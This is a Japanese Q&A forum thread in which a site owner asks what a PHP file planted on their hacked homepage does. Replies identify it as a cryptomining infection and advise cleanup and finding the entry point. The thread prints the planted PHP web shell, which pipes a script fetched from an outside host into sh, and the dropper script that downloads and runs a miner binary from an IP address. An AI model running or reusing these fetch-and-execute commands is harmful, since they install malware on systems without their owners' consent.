Q&A
あー、予想してたとおり、マイニング関係なんですね、やっぱり…。
HPがハッキングされ、新しく作成されていたファイルに以下のように書き込まれていました。
何が実行されたのでしょうか?
PHP
1<?php 2//with love from moscow <3 3exec('if curl 127.0.0.1 -o /dev/null 2>/dev/null; then curl -o - http://vps112041.ovh.net/1039.txt|sh; else wget -O - http://vps112041.ovh.net/1039.txt|sh; fi'); 4echo 'done'; 5?>
回答3件
0
以下のウイルスの設置あるいは感染のようですね。専門家に分析・駆除をしてもらうことをお勧めします。
(追記)
設置されたファイルの除去だけならセキュリティの専門家でなくてもできると思いますが、侵入経路を調べてそこを手当しないと、再度同じ方法で侵入されますよ。
投稿2018/03/12 11:16
編集2018/03/12 11:43
総合スコア11701
0
ベストアンサー
これみたいですね。
投稿2018/03/12 11:19
退会済みユーザー
総合スコア0
0
こんなシェルスクリプトをwgetしてshに渡してますね。
とりあえず、内容はこれから読んでみます。
sh
1#!/bin/bash 2 3pkill -f xmr 4 5isTmp=true 6echo "echo 1" > /tmp/7000007 7chmod 777 /tmp/7000007 8if ! /tmp/7000007; then 9 isTmp=false 10fi 11 12if wget -q 127.0.0.1 -O /dev/null; then 13 if ! $isTmp ; then 14 mkdir -p .123 && cd .123 && wget -O xmr http://37.59.105.27/u_v3_w.txt && chmod 777 xmr && ./xmr 15 else 16 cd /tmp/ && mkdir -p .123 && cd .123 && wget -O xmr http://37.59.105.27/u_v3_w.txt && chmod 777 xmr && ./xmr 17 fi 18else 19 if ! $isTmp ; then 20 mkdir -p .123 && cd .123 && curl -o xmr http://37.59.105.27/u_v3_w.txt && chmod 777 xmr && ./xmr 21 else 22 cd /tmp/ && mkdir -p .123 && cd .123 && curl -o xmr http://37.59.105.27/u_v3_w.txt && chmod 777 xmr && ./xmr 23 fi 24fi
投稿2018/03/12 11:13
退会済みユーザー
総合スコア0
http://37.59.105.27/u_v3_w.txt は、安全ではないのでNortonさんが自動で削除してくれちゃう感じですね…。
37.59.96.0 - 37.59.127.255 は意外にもフランスさんか…。
あなたの回答
tips
プレビュー
バッドをするには、ログインかつ
こちらの条件を満たす必要があります。
2018/03/12 11:51